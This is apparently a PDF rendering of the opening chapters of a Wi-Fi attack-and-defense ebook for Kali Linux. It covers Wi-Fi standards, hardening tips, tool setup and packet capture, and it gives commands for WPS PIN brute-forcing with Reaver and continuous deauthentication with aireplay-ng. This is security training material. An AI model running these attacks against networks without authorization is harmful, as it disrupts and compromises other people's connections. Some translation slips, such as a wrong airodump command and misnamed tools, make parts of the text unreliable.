Kali Linux - Attack and Defense Wi-Fi 2024

Download as pdf or txt
Download as pdf or txt
You are on page 1of 173

KALI LINUX

WI-FI ATTACK AND DEFENSE


2024 Edition

Diego Rodrigues
CONTENTS

Title Page
Greetings
ABOUT THE AUTHOR
PREFACE
Chapter 1: Wi-Fi Networking Fundamentals
Chapter 2: Configuring the Kali Linux Environment
Chapter 3: Wi-Fi Network Analysis
Chapter 4: Deauthentication Attacks
Chapter 5: Wi-Fi Password Cracking
Capítulo 6: Ataques Man-in-the-Middle
Chapter 7: WPS Vulnerability Exploitation
Chapter 8: Evil Twin Attacks
Chapter 9: Packet Sniffing and Spoofing
Chapter 10: Packet Injection
Chapter 11: Enterprise Wi-Fi Network Security
Chapter 12: Creating Secure Wi-Fi Networks
Chapter 13: Wi-Fi Auditing and Penetration Testing
Chapter 15: Using Scripts and Automation in Wi-Fi Testing
Chapter 16: Social Engineering Techniques in Wi-Fi Attacks
Chapter 17: IoT and Wi-Fi Security
Chapter 18: Wi-Fi Security Skills Development
Chapter 19: Real Case Studies 2022 2023 2024
Chapter 20: Future Trends in Wi-Fi Security
General Conclusion
KALI LINUX
WI-FI ATTACK AND DEFENSE
2024 Edition

Author: Diego Rodrigues


© 2024 Diego Rodrigues. All rights reserved.
No part of this work may be reproduced, stored in a retrieval system, or transmitted in any form
or by any means, electronic, mechanical, photocopying, recording, or otherwise, without the
prior written permission of the author, except for brief quotations embodied in critical reviews
and for non-commercial educational use, as long as the author is properly cited.
The author grants permission for non-commercial educational use of the work, provided that the
source is properly cited.
Although the author has made every effort to ensure that the information contained in this book
is correct at the time of publication, he assumes no responsibility for errors or omissions, or for
loss, damage, or other problems caused by the use of or reliance on the information contained in
this book.
Published by Diego Rodrigues.
Important note
The codes and scripts presented in this book aim to illustrate the concepts discussed in the
chapters, serving as practical examples. These examples were developed in custom, controlled
environments, and therefore there is no guarantee that they will work fully in all scenarios. It is
essential to check the configurations and customizations of the environment where they will be
applied to ensure their proper functioning. We thank you for your understanding.
GREETINGS
Hello, dear reader!
I'm extremely excited to see that you've decided to embark on this fascinating journey into the
world of Wi-Fi attacks and defenses using Kali Linux. The decision to invest in your personal
and professional development in the field of cybersecurity is admirable, and I am here to ensure
that this journey is both enriching and transformative.
Information technology, especially cybersecurity, offers countless opportunities for those
dedicated to mastering it. However, it is a field that requires constant updating and the
continuous development of technical and interpersonal skills. It was exactly with this in mind
that we created this technical literature format for quick learning and immediate application.
This book, "Kali Linux Wi-Fi Attack and Defense 2024", is designed to give you an in-depth,
practical understanding of the most effective attack and defense techniques on Wi-Fi networks.
From the fundamentals to the most advanced applications, you You will have access to essential
concepts and tools necessary to immediately apply what you have learned, thus increasing your
value in the job market.
The urgency to stay up to date has never been greater. The knowledge and skills you will acquire
here will be your greatest allies in your career, allowing you to stand out in a competitive and
constantly evolving field. Don't waste time and start turning your ideas into reality with this
powerful resource.
Let's explore Wi-Fi security tools and techniques with Kali Linux together. Prepare yourself for
an intense and rewarding learning experience that will broaden your horizons and enhance your
capabilities.
Welcome aboard this journey towards excellence!
ABOUT THE AUTHOR
www.amazon.com/author/diegorodrigues
www.linkedin.com/in/diegoexpertai

Amazon Best Seller Author, Diego Rodrigues is an International Consultant and Writer
specializing in Market Intelligence, Technology and Innovation. With 42 international
certifications from institutions such as IBM, Google, Microsoft, AWS, Cisco, and Boston
University, Ec-Council, Palo Alto and META.
Rodrigues is an expert in Artificial Intelligence, Machine Learning, Data Science, Big Data,
Blockchain, Connectivity Technologies, Ethical Hacking and Threat Intelligence.
Since 2003, Rodrigues has developed more than 200 projects for important brands in Brazil,
USA and Mexico. In 2024, he consolidates himself as one of the largest new generation authors
of technical books in the world, with more than 140 titles published in six languages.
Author's Bibliography with the Main Titles can be found on his exclusive page on Amazon:
www.amazon.com/author/diegorodrigues
PREFACE
It is with great enthusiasm that I present to you this unique work on Wi-Fi attacks and defenses
using Kali Linux. The decision to invest in your personal and professional development in the
area of cybersecurity is admirable, and this book was created with the aim of making this journey
both enriching and transformative.
The security of Wi-Fi networks is an essential area in information technology, especially in the
current context where wireless connectivity is prevalent in home and corporate environments.
Mastering Wi-Fi attack and defense techniques with Kali Linux not only improves your technical
skills but also significantly increases your value in the job market, where the demand for
cybersecurity professionals is constantly growing.
This book, "KALI LINUX WI-FI ATTACK AND DEFENSE", has been meticulously designed
to provide an in-depth and practical understanding of the most effective attack and defense
techniques on Wi-Fi networks. The work is structured to ensure quick and easy learning.
Immediate application of acquired knowledge, allowing you to stand out in a highly competitive
and constantly evolving field.

Advantages of Acquiring This Knowledge


Mastering Wi-Fi attack and defense techniques with Kali Linux offers numerous advantages. In
an increasingly digitized world where wireless connectivity is crucial to the operation of
businesses and everyday life, understanding vulnerabilities and how to protect them is an
invaluable skill. This knowledge allows you to:
1. Identify and Fix Vulnerabilities: Understanding weaknesses in Wi-Fi networks
and knowing how to fix these vulnerabilities is critical to ensuring the security of
sensitive data.
2. Protect Confidential Information: The defense techniques taught in this book help
protect confidential information against unauthorized access and malicious attacks.
3. Increase Corporate Security: In corporate environments, the security of Wi-Fi
networks is crucial for data protection and business continuity. This knowledge
allows you to implement robust security measures.
4. Improve Your Career Prospects: The ability to perform Wi-Fi security audits and
implement defensive measures is highly valued in the job market, providing better
employment opportunities and career advancement.
Chapter Overview
Chapter 1: Wi-Fi Networking Fundamentals
In this chapter, you will be introduced to the basic concepts of Wi-Fi networks, including their
architecture, components, and the standards and protocols that govern their operation.
Understanding these fundamentals is essential for any cybersecurity professional, as it provides
the foundation needed to identify vulnerabilities and implement effective security measures.
Chapter 2: Configuring the Kali Linux
Environment
The second chapter focuses on configuring Kali Linux, a powerful distribution for penetration
testing and security audits. You'll learn how to install and configure Kali Linux, as well as
explore essential tools for Wi-Fi testing. Tips on keeping your system up to date and secure are
also covered, ensuring you're prepared to perform security testing effectively.
Chapter 3: Wi-Fi Network Analysis
Analyzing Wi-Fi networks is a crucial step in identifying vulnerabilities. This chapter covers the
network analysis tools available in Kali Linux, teaching how to capture and interpret data
packets. You'll learn how to identify patterns and vulnerabilities in Wi-Fi networks, as well as
generate detailed reports on your findings.
Chapter 4: Deauthentication Attacks
Deauthentication attacks are a common technique used to disrupt the connectivity of devices on a
Wi-Fi network. In this chapter, you will explore the basics of these attacks, the tools and
methods of execution, and mitigation and defense strategies. Case studies are included to
illustrate how these attacks are carried out in practice.
Chapter 5: Wi-Fi Password Cracking
Cracking Wi-Fi passwords is a critical skill for any cybersecurity professional. This chapter
covers Wi-Fi password attack methods, including brute force and dictionary attacks. You will
learn how to use specific password cracking tools and implement effective protections against
these types of attacks.

Capítulo 6: Ataques Man-in-the-Middle


Man-in-the-Middle (MITM) attacks allow an attacker to intercept and possibly alter
communication between devices on the network. In this chapter, you will discover how to
perform MITM attacks on Wi-Fi networks, what tools are used, and how to prevent and detect
these attacks. Understanding these methods is vital to ensuring the integrity and confidentiality
of communications over a Wi-Fi network.
Chapter 7: WPS Vulnerability Exploitation
Wi-Fi Protected Setup (WPS) is a feature that makes it easier to connect devices to a Wi-Fi
network, but it also has significant vulnerabilities. This chapter explores these vulnerabilities and
WPS exploitation methods. You will learn how to use specific tools for this purpose and how to
strengthen WPS security to protect your network.
Chapter 8: Evil Twin Attacks
Evil Twin attacks involve creating a malicious access point that impersonates a legitimate
network. In this chapter, you will learn how to configure an Evil Twin access point, the
techniques and tools used, and countermeasures to protect your networks against this threat.
Chapter 9: Packet Sniffing and Spoofing
Packet sniffing and spoofing are techniques used to intercept and manipulate data on a network.
This chapter covers the fundamentals of these techniques, the sniffing and spoofing tools
available in Kali Linux, and practical examples of how these techniques are used. Defense
measures against these attacks are also covered, ensuring you are prepared to protect your
networks.
Chapter 10: Packet Injection
Packet injection allows an attacker to send malicious packets to a network with the aim of
causing damage or stealing information. In this chapter, you will explore what packet injection
is, the tools and methods used, and practical examples of injection attacks. Mitigation and
defense techniques are included to help protect your networks against this threat.
Chapter 11: Enterprise Wi-Fi Network
Security
Corporate Wi-Fi networks present specific security challenges due to the volume of data and the
number of connected devices. This chapter addresses these challenges, implementing robust
security measures, and using monitoring and defense tools. Case studies are included to illustrate
how these measures are applied in corporate environments.
Chapter 12: Creating Secure Wi-Fi Networks
Creating secure Wi-Fi networks is essential for both home and corporate environments. This
chapter provides best practices for configuring secure networks, including essential security
settings and security scanning tools. Tips on ongoing network maintenance are also covered,
ensuring your network remains secure in the long term.
Chapter 13: Wi-Fi Auditing and Penetration
Testing
Auditing and performing penetration tests on Wi-Fi networks are crucial steps to identifying and
fixing vulnerabilities. This chapter covers planning Wi-Fi audits, running penetration tests, and
generating detailed reports. You will learn how to implement improvements and corrective
actions based on audit results.
Chapter 14: Kali Linux Advanced Tools for
Wi-Fi
Kali Linux offers a wide range of advanced tools for Wi-Fi penetration testing. This chapter
reviews these tools, provides practical use cases, and compares different tools to help you choose
the ones best suited for your needs. Integration with other security tools is also discussed,
providing a holistic approach to Wi-Fi security.
Chapter 15: Using Scripts and Automation in
Wi-Fi Testing
Wi-Fi test automation can significantly increase your efficiency and accuracy. In this chapter,
you will learn how to develop custom scripts to automate Wi-Fi security testing. Examples of
automation scripts are provided, along with a discussion of the benefits and challenges of
automation in cybersecurity.
Chapter 16: Social Engineering Techniques
in Wi-Fi Attacks
Social engineering is a powerful technique that can be used in conjunction with technical attacks
to compromise the security of Wi-Fi networks. This chapter explores social engineering methods
and tools, real-life attack cases, and defense measures against social engineering. Understanding
these techniques is essential for a comprehensive approach to Wi-Fi security.
Chapter 17: IoT and Wi-Fi Security
With the growth of the Internet of Things (IoT), the security of Wi-Fi networks connecting IoT
devices has become even more critical. This chapter covers IoT security challenges, common
vulnerabilities, and testing tools for IoT devices. Tips on how to secure IoT devices on your Wi-
Fi network are also provided.
Chapter 18: Wi-Fi Security Skills
Development
Developing Wi-Fi security skills is an ongoing process. This chapter provides guidance on
recommended certifications and training, labs and practice environments, and lifelong learning
resources. Tips on how to build a career in Wi-Fi security are included, helping you become a
highly competent cybersecurity professional.
Chapter 19: Real Case Studies
Analyzing real-world cases of Wi-Fi attacks and defenses provides valuable insights into
practices and techniques used in the real world. This chapter includes detailed analyzes of
notorious attacks, lessons learned, and practical application of the knowledge gained. Thoughts
on the future of Wi-Fi security are also discussed, preparing you for the challenges ahead.
Chapter 20: Future Trends in Wi-Fi Security
The field of Wi-Fi security is constantly evolving, and it's important to stay up to date on future
trends. This chapter explores the evolution of Wi-Fi threats, emerging technologies, and the
impact of artificial intelligence and machine learning on Wi-Fi security. Tips on how to prepare
for the future are provided, helping you stay ahead of threats.

Encouraging Complete Reading


Throughout this book, you will find a detailed and practical approach to mastering Wi-Fi attack
and defense techniques using Kali Linux. Each chapter has been carefully designed to provide
quick learning and immediate application, ensuring you are prepared to face cybersecurity
challenges with confidence and competence.
Reading this book will not only increase your technical knowledge, but also improve your
practical skills, making you a highly valued professional in the job market. Wi-Fi network
security is a crucial area in information technology, and this book provides the tools and
knowledge you need to excel in this constantly evolving field.
If you are reading this free preview through Amazon, I encourage you to purchase the full book
to access all of the in-depth content and advanced techniques this resource offers. This
investment in your professional development will be rewarded with skills and knowledge that
will open up new opportunities in your career.
Prepare yourself for an intense and rewarding journey, where each chapter will broaden your
horizons and enhance your capabilities. Welcome aboard this journey to Wi-Fi security
excellence with Kali Linux. I look forward to joining you on this adventure of learning and
growth. Let's explore Wi-Fi security tools and techniques together, and turn your ideas into
reality with this powerful resource.
CHAPTER 1: WI-FI NETWORKING
FUNDAMENTALS

Introduction to Wi-Fi Networks


Wi-Fi networks have revolutionized the way we connect to the internet and exchange
information. They use radio waves to transmit data between devices, eliminating the need for
physical cables. This brought enormous convenience, allowing mobility and flexibility that we
consider indispensable today. With the increased use of mobile devices and the growing demand
for connectivity, understanding the basics of Wi-Fi networks is crucial for any technology
professional.

Components and Architecture


To understand Wi-Fi networks, it is essential to know their main components and how they
integrate to form a functional network. Next, we will discuss the main components of a Wi-Fi
network and the architecture that connects them.

Access Points (APs)


Access point (AP) is a device that allows wireless devices to connect to a network. It functions as
a central hub that transmits and receives radio signals. In enterprise environments, multiple APs
are often used to cover large areas, with each AP connected to the main network via Ethernet
cable. AP plays a vital role in coordinating communication between wireless devices and the
wired network.

Client Devices
Client devices are those that connect to the access point. These devices include laptops,
smartphones, tablets, wireless printers, and any other Wi-Fi enabled device. Each client device
has a Wi-Fi adapter that allows it to connect to the AP. The interaction between the AP and client
devices is what makes the Wi-Fi network useful and accessible to end users.

Network Controllers
Network controllers, mainly used in corporate environments, manage multiple APs, allowing
centralized administration of configurations, security policies and performance monitoring. They
help optimize coverage and minimize interference, ensuring a stable and secure connection.
Network controllers are essential for the efficient maintenance and management of large-scale
Wi-Fi networks.

Network Architecture
The architecture of a Wi-Fi network can be divided into two main types: infrastructure networks
and ad hoc networks.

Infrastructure Network
This is the most common type of Wi-Fi network, where devices communicate through a central
access point. Most home and business networks use this architecture. The AP is connected to a
router, which in turn is connected to the internet, allowing all devices on the network to access
the internet. This framework allows for centralized management and easier implementation of
security policies.

Return To This
In an ad hoc network, devices connect directly to each other without the need for a central AP.
This type of network is useful in temporary or emergency situations where traditional
infrastructure is not available. Ad hoc networks offer flexibility and speed of deployment,
although they may not be as secure or efficient as infrastructure networks.

Wi-Fi Standards and Protocols


Wi-Fi standards are defined by the Institute of Electrical and Electronics Engineers (IEEE), and
are identified by the designation 802.11 followed by a letter (for example, 802.11b, 802.11g).
Each standard defines the theoretical maximum speed, the frequency used and other technical
characteristics.

IEEE 802.11a/b/g/n/ac/ax
Wi-Fi standards have evolved significantly over time, each offering improvements in terms of
speed, efficiency, and security.
802.11b: Launched in 1999, it operates on the 2.4 GHz frequency with a theoretical maximum
speed of 11 Mbps. It was one of the first widely adopted standards, but is now considered
obsolete due to its speed limitations.
802.11a: Also launched in 1999, it operates on a frequency of 5 GHz with a maximum
theoretical speed of 54 Mbps. Although it offers better performance than 802.11b, its adoption
has been limited due to its higher cost and shorter signal range.
802.11g: Launched in 2003, it combines the best characteristics of standards a and b, operating at
2.4 GHz with a maximum speed of 54 Mbps. It has become a popular standard due to its balance
between cost, performance and compatibility.
802.11n: Introduced in 2009, it operates in 2.4 GHz and 5 GHz with a maximum speed of up to
600 Mbps, using MIMO (Multiple Input, Multiple Output). This standard has brought a
significant increase in speed and efficiency, being widely adopted in both home and corporate
environments.
802.11ac: Launched in 2013, it operates exclusively at 5 GHz with speeds that can reach up to
3.5 Gbps, using advanced MIMO techniques and wider channels. This standard is ideal for
applications that require high bandwidth, such as high-definition video streaming and online
gaming.
802.11ax: Also known as Wi-Fi 6, it is the most recent standard, released in 2019, that operates
at 2.4 GHz and 5 GHz, and can reach speeds exceeding 10 Gbps. It offers better efficiency and
capacity in dense environments, as well as significant improvements in terms of security and
energy consumption.

Wi-Fi Security Protocols


Security is a crucial concern in Wi-Fi networks due to the open-transmission nature of radio
waves. Key security protocols include:
WEP (Wired Equivalent Privacy): The first security protocol for Wi-Fi networks, released in
1997. It was quickly surpassed due to its security weaknesses and is considered insecure. WEP's
main vulnerability is the possibility of brute force attacks, which can decipher the encryption key
in a few minutes.
WPA (Wi-Fi Protected Access): Introduced as an intermediate solution to correct WEP flaws,
using the TKIP (Temporal Key Integrity Protocol) protocol. Although it is more secure than
WEP, WPA still has vulnerabilities, especially in older implementations.
WPA2: Launched in 2004, it is the improved version of WPA, using the AES (Advanced
Encryption Standard) protocol for encryption. It is widely used and considered safe. WPA2-PSK
(Pre-Shared Key) is common in home networks, while WPA2-Enterprise, which uses a RADIUS
authentication server, is used in corporate environments.
WPA3: The latest version, introduced in 2018, offers significant security improvements,
including stronger encryption and protections against brute force attacks. WPA3-Personal uses
SAE (Simultaneous Authentication of Equals) to replace WPA2-PSK, providing stronger
security even with weak passwords.

Basic Security on Wi-Fi Networks


Ensuring the security of a Wi-Fi network is essential to protect sensitive data and prevent
unauthorized access. Below, we discuss best practices for basic Wi-Fi network security.

Setting Strong Passwords


One of the simplest and most effective measures is to set strong passwords for accessing the Wi-
Fi network. Strong passwords must be long, containing a combination of upper and lower case
letters, numbers and special characters. Avoid using easily guessable information, such as names
or dates of birth. Furthermore, it is recommended to change passwords periodically to increase
security.

Use of Appropriate Security Protocols


The use of security protocols such as WPA2 or WPA3 is essential. Configure your router to use
the strongest security protocol available. Avoid using WEP as it is vulnerable to attacks. Ensure
that all devices connected to the network support the chosen protocol to ensure compatibility and
security.

Changing the Default SSID


The SSID (Service Set Identifier) is the name of the Wi-Fi network. Changing the default SSID
provided by the manufacturer can make it difficult for an attacker to identify the make and model
of the router, which may have known vulnerabilities. Use a unique SSID and avoid names that
reveal personal or company information. Additionally, consider hiding the SSID to reduce
network visibility, although this does not provide significant protection against determined
attacks.

WPS deactivation
Wi-Fi Protected Setup (WPS) is a function that makes it easier to connect devices to the Wi-Fi
network, but it also has significant vulnerabilities. Disabling WPS on your router can prevent
attacks that exploit these vulnerabilities. Disabling WPS is a simple measure that can
significantly increase network security.

Firmware Updates
Keep your router's firmware updated to ensure it has the latest security fixes and performance
improvements. Check the manufacturer's website regularly for updates and apply them as
needed. Regular firmware maintenance is essential to protect the network against newly
discovered threats and vulnerabilities.

Network Segmentation
For greater security, consider network segmentation, creating separate networks for different
types of devices. For example, a network for IoT (Internet of Things) devices can be isolated
from the main network used by computers and smartphones. This limits exposure if an IoT
device is compromised. Network segmentation can be implemented through VLANs (Virtual
Local Area Networks) in advanced routers and switches.
Use of Firewalls
Implementing firewalls can help protect your network from unwanted traffic and attacks. Most
modern routers come with built-in firewalls that can be configured to add an extra layer of
security. Configure firewall rules to block unused ports and protocols, as well as to allow only
necessary traffic.

Network Monitoring
Monitoring network activity can help you quickly detect and respond to suspicious activity. Use
network monitoring tools to keep track of who is connected, identify unusual traffic patterns, and
take preventative action when necessary. Tools like Wireshark, NetFlow and SNMP (Simple
Network Management Protocol) are useful for this purpose.

Practical Scripts and Settings


To complement the theory presented, this chapter includes examples of scripts and practical
configurations that can be used to ensure the security of your Wi-Fi network.

Example Script for Packet Capture with


Wireshark
Wireshark is a powerful packet analysis tool that can be used to monitor network traffic. Below
is an example of a basic packet capture script:
bash
#!/bin/bash
# Script to capture network packets using Wireshark
INTERFACE="wlan0" # Network interface to monitor
OUTPUT_FILE="captura.pcap" # Output file
echo "Starting packet capture on interface $INTERFACE..."
sudo tshark -i $INTERFACE -w $OUTPUT_FILE
echo "Capture completed. File saved as $OUTPUT_FILE"

It is script use o tshark, which is the command line version of Wireshark. To run this script, save
it to a file, e.g. captura.sh, and make it executable with the command chmod +x captura.sh. Then
run it with sudo ./captura.sh.

Firewall configuration with iptables


iptables is a packet filtering tool used to configure firewall rules in Linux. The following is a
basic configuration example to block all inbound traffic except HTTP (port 80) and HTTPS (port
443) traffic:
bash
#!/bin/bash
# Script to configure basic firewall using iptables
echo "Configuring firewall with iptables..."
# Clear all existing rules
sudo iptables -F
# Configure default policies to block all incoming traffic
sudo iptables -P INPUT DROP
sudo iptables -P FORWARD DROP
sudo iptables -P OUTPUT ACCEPT
# Allow loopback traffic
sudo iptables -A INPUT -i lo -j ACCEPT
# Allow incoming traffic for already established connections
sudo iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
# Allow HTTP (port 80) and HTTPS (port 443) traffic
sudo iptables -A INPUT -p tcp --dport 80 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 443 -j ACCEPT
echo "Firewall configuration complete."

Save this script to a file, e.g. firewall.sh, and make it executable with chmod +x firewall.sh. Then
run it with sudo ./firewall.sh to apply firewall rules.

This chapter has provided a comprehensive introduction to the fundamentals of Wi-Fi networks,
covering everything from components and architecture to standards and protocols, as well as
essential security practices. Understanding these concepts is crucial for any cybersecurity
professional as they provide the foundation needed to protect wireless networks against threats.
The sample scripts and practical configurations presented provide a practical approach to
applying the concepts discussed. As you progress through this book, you will continue to build
on these foundations by exploring more advanced Wi-Fi attack and defense techniques with Kali
Linux.
Deep understanding and practical application of this knowledge will allow you to excel in the
field of cybersecurity, effectively protecting Wi-Fi networks in an increasingly digital and
interconnected environment. Prepare yourself for an intense and rewarding journey, where each
chapter will broaden your horizons and enhance your capabilities.
CHAPTER 2: CONFIGURING THE KALI
LINUX ENVIRONMENT

Kali Linux Installation and Configuration


To start using Kali Linux, you need to install it correctly. Kali Linux is a Linux distribution
specialized in penetration testing and security audits. It can be installed on physical machines,
virtual machines or even mobile devices.

Download ISO Image


The first step is to download the Kali Linux ISO image. Go to the official Kali Linux website
(https://www.kali.org) and navigate to the downloads section. Choose the version that best suits
your environment. There are options for different architectures (x86, x64, ARM) and installation
methods (ISO image, OVA for virtualization, etc.).

Creating Installation Media


After downloading the ISO image, create installation media. If you plan to install Kali Linux on
a physical machine, use bootable USB creation software such as Rufus (Windows) or Balena
Etcher (Windows, macOS, Linux). Insert an empty pendrive into your computer, open the
chosen software and select the downloaded ISO image. Follow the instructions to create the
bootable USB.

Installation on a Physical Machine


Insert the pendrive into the computer where you want to install Kali Linux and restart the
machine. During boot, access the boot menu (usually by pressing F12, Esc, or another key
depending on the manufacturer) and select the pendrive as the boot device. When the Kali Linux
installer loads, follow the installation wizard steps:
1. Choose the language.
2. Configure the keyboard layout.
3. Configure the network (optional).
4. Create a user and set a password.
5. Partition the disk (it is recommended to use the guided option for beginners).
6. Install the system and GRUB bootloader.
Installation on a Virtual Machine
If you choose to install Kali Linux on a virtual machine, use virtualization software such as
VirtualBox or VMware. Create a new virtual machine, select the Kali Linux ISO image as the
boot disk, and configure the virtual machine with at least 2 GB of RAM and 20 GB of disk
space. Follow the same installation wizard steps described previously.

First Startup and Basic Settings


After installation, restart the system and log in with the created credentials. The first boot may
take a while as the system configures some packages and services. After logging in, it is
important to update the system and repositories.
bash
sudo apt update
sudo apt upgrade -y

These commands ensure that all packages are updated with the latest security and functionality
versions.

Essential Wi-Fi Testing Tools


Kali Linux comes with a wide range of pre-installed tools for penetration testing. However, some
tools are essential for Wi-Fi testing.

Aircrack-ng
Aircrack-ng is a suite of tools for evaluating the security of Wi-Fi networks. It includes tools for
capturing packets, injecting packets, performing deauthentication attacks, and more.
bash
sudo apt install aircrack-ng

After installation, you can use commands like airodump-ng to capture packets and aircrack-ng to
crack WEP/WPA passwords.

Reaver
Reaver is a tool for attacking WPS-protected Wi-Fi networks. It uses brute force attacks to guess
the WPS PIN, which can be used to recover the WPA/WPA2 password.
bash
sudo apt install reaver
To use Reaver, start with the command reaver -i [interface] -b [BSSID] -vv.

Wireshark
Wireshark is a packet analysis tool that allows you to capture and interact with network traffic in
real time. It is useful for deep packet inspection and traffic analysis.
bash
sudo apt install wireshark

Start Wireshark with sudo wireshark and select the network interface to begin packet capture.

Fern WiFi Cracker


Fern WiFi Cracker is a graphical tool for auditing and recovering keys in wireless networks.
Supports WEP/WPA/WPS attacks.
bash
sudo apt install fern-wifi-cracker

Start with sudo fern-wifi-cracker and follow the graphical interface to perform security audits.

System Update and Maintenance


Keeping Kali Linux updated is crucial to ensure the security and correct functioning of the tools.
In addition to regular system updates, it is important to carry out periodic maintenance.

System Updates
Check and apply updates regularly with the following commands:
bash
sudo apt update
sudo apt upgrade -y
sudo apt dist-upgrade -y

The command dist-upgrade ensures that all dependencies and packages are updated correctly,
even if new versions require system configuration changes.

Package Cleaning
Remove unnecessary packages and clear system cache to free up disk space:
bash
sudo apt autoremove -y
sudo apt clean
sudo apt autoclean

These commands remove obsolete packages and temporary files that are no longer needed.

Backup Regular
Perform regular backups of important files and settings. Use tools like rsync or automatic backup
solutions to ensure you can restore your system quickly in case of failures.
bash
rsync -av --progress /home/user /media/backup/

This command makes a backup of the directory /home/user to a backup device mounted on
/media/backup/.

Tips for a Safe Testing Environment


When setting up a test environment for Wi-Fi networks, it is important to ensure that the
environment is secure and isolated to avoid interference and legal issues. Below are some tips for
setting up a secure testing environment.

Isolated Environment
Perform security testing in an isolated environment. Use local networks that are not connected to
the public internet or set up a separate testing area using dedicated APs and devices.

Legal Permission
Make sure you have permission to test Wi-Fi networks. Testing networks without authorization
is illegal and can result in serious legal consequences. Always obtain written permission before
beginning any testing.

Use of Test Networks


Create test Wi-Fi networks specifically for security auditing. Configure access points and client
devices that can be used to simulate attack and defense scenarios.

Virtualization Tools
Use virtualization tools to simulate Wi-Fi networks. Software like GNS3 and EVE-NG allow
you to create complex network environments that can be used for security testing without the
need for physical hardware.

Monitoring and Logging


Monitor and record all activity during testing. Use logging tools to capture detailed logs of all
actions, which can be later analyzed to identify problems and improve testing techniques.

Practical Configuration Examples


To complement the tips provided, below are some practical configuration examples to ensure a
safe and efficient environment.

Configuring a Test Access Point


Configure a dedicated AP for security testing. The following is an example configuration for an
AP using hostapd no Kali Linux.
1. Install the hostapd:
bash
sudo apt install hostapd

2. Create a configuration file for the hostapd:


bash
sudo nano /etc/hostapd/hostapd.conf

Add the following lines:


text
interface=wlan0
driver=nl80211
ssid=TestWiFi
hw_mode=g
channel=6
auth_algs=1
wpa=2
wpa_passphrase=TestPass123
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP

3. Edit the network interface configuration file:


bash
sudo nano /etc/network/interfaces
Add the following lines:
text
iface wlan0 inet static
address 192.168.1.1
netmask 255.255.255.0

4. Configure the DHCP server:


bash
sudo apt install isc-dhcp-server
sudo nano /etc/dhcp/dhcpd.conf

Add the following lines:


text
subnet 192.168.1.0 netmask 255.255.255.0 {
range 192.168.1.10 192.168.1.50;
option routers 192.168.1.1;
option domain-name-servers 8.8.8.8, 8.8.4.4;
}

5. Start the services:


bash
sudo service hostapd start
sudo service isc-dhcp-server start

This example creates an AP with SSID "TestWiFi" and password "TestPass123", using the driver
nl80211. The AP will work on channel 6, using WPA2 for security.

Packet Capture Configuration with


Aircrack-ng
To capture packets from a Wi-Fi network using Aircrack-ng, follow these steps:
1. Put the network interface in monitor mode:
bash
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up

2. Start packet capture with airodump-ng:


bash
sudo airodump-ng wlan0

3. Capture packets from a specific network:


bash
sudo airodump-ng -c [channel] --bssid [BSSID] -w capture wlan0

Replace [channel] through the network channel and [BSSID] by the MAC address of the AP.

Customer Deauthentication
Perform a deauthentication attack to test network security:
1. Identify the client's BSSID and MAC address with airodump-ng.
2. Perform the deauthentication attack with airplay-ng:
bash
sudo aireplay-ng --deauth 0 -a [BSSID] -c [client MAC] wlan0

Replace [BSSID] by the MAC address of the AP and [client MAC] by the client's MAC address.

By setting up and maintaining a secure and efficient testing environment on Kali Linux, you can
perform penetration testing and Wi-Fi security audits effectively. By following the guidelines
and practical examples presented, you will be well prepared to explore advanced Wi-Fi security
techniques, protecting your networks against threats and vulnerabilities. Proper preparation and
maintenance are critical to ensuring your tests are performed safely and ethically, providing
valuable results to improve network security.
CHAPTER 3: WI-FI NETWORK
ANALYSIS

Network Analysis Tools


Wi-Fi network analysis is a critical component in cybersecurity. To understand network
vulnerabilities and behavior, it is essential to use specialized tools that allow you to capture and
analyze data packets. In this chapter, we will explore some of the most effective tools for
analyzing Wi-Fi networks.

Wireshark
Wireshark is one of the most powerful and widely used tools for packet analysis. It allows you to
capture and interact with network traffic in real time, offering an intuitive graphical interface to
visualize captured data.
Installation:
bash
sudo apt install wireshark

Basic Use:
Start Wireshark with superuser privileges:
bash
sudo wireshark

1. Select the network interface to capture.


2. Click the capture button to start monitoring traffic.
3. Analyze captured packets using available filters to focus on specific data.

Aircrack-ng
Aircrack-ng is a suite of tools for Wi-Fi security auditing. It includes tools for packet capture,
packet injection, deauthentication attacks, and more.
Installation:
bash
sudo apt install aircrack-ng

Included Tools:
○ airodump-ng: Captures network packets.
○ airplay-ng: Packet injection and deauthentication attacks.
○ aircrack-ng: Cracking WEP and WPA passwords.
○ airmon-ng: Puts the network interface in monitor mode.

The kismet
Kismet is a wireless network detection tool that works in passive mode, allowing the detection of
hidden networks and the capture of packets without active transmission.
Installation:
bash
sudo apt install kismet

Basic Use:
Start o Kismet:
bash
sudo kismet

Configure the network interface and start network discovery.


View and analyze detected networks and captured packets.

Fern WiFi Cracker


Fern WiFi Cracker is a graphical tool for Wi-Fi security auditing. It supports WEP, WPA and
WPS attacks.
Installation:
bash
sudo apt install fern-wifi-cracker

Basic Use:
Launch Fern WiFi Cracker:
bash
sudo fern-wifi-cracker
Select the network interface and start scanning networks.
Execute attacks against selected networks using the graphical interface.

Packet Capture and Interpretation


Capturing and interpreting data packets is a fundamental skill for any Wi-Fi network security
analyst. Next, we will see how to capture packets using some of the tools mentioned and how to
interpret the captured data.

Packet Capture with Aircrack-ng


Monitor Mode: To capture packets, first put the network interface in monitor mode.
bash
sudo airmon-ng start wlan0

Capture with Airodump-ng: Use o airodump-ng to capture packets from a specific network.
bash
sudo airodump wlan0mon
To focus on a specific network, use the channel and BSSID parameters:
bash
sudo airodump-ng -c [canal] --bssid [BSSID] -w capture wlan0mon

Packet Capture with Wireshark


Starting Capture:
1. Start Wireshark with superuser privileges.
2. Select the network interface to capture.
3. Click the capture button to start monitoring traffic.
Packet Filtering: Use filters to focus on specific packages. For example, to filter only HTTP
packets:
text
http
Packet Interpretation
Once the packets have been captured, the next step is to interpret the data to identify patterns and
vulnerabilities.
● MAC addresses: Each device on the network has a unique MAC address. Identifying the
MAC addresses of connected devices can help map the network.
● Protocols: Different protocols are used for different types of communication. Analyzing
protocols can reveal information about the types of traffic on the network.
● Packet Analysis: Inspect individual packages to understand the content and structure.
This may include analysis of packet headers, transmitted data, and control flags.

Identification of Patterns and Vulnerabilities


Identifying patterns and vulnerabilities in a Wi-Fi network is crucial to assessing its security.
Using packet capture tools and techniques, we can analyze network traffic to find weaknesses
and suspicious patterns.

Traffic Analysis
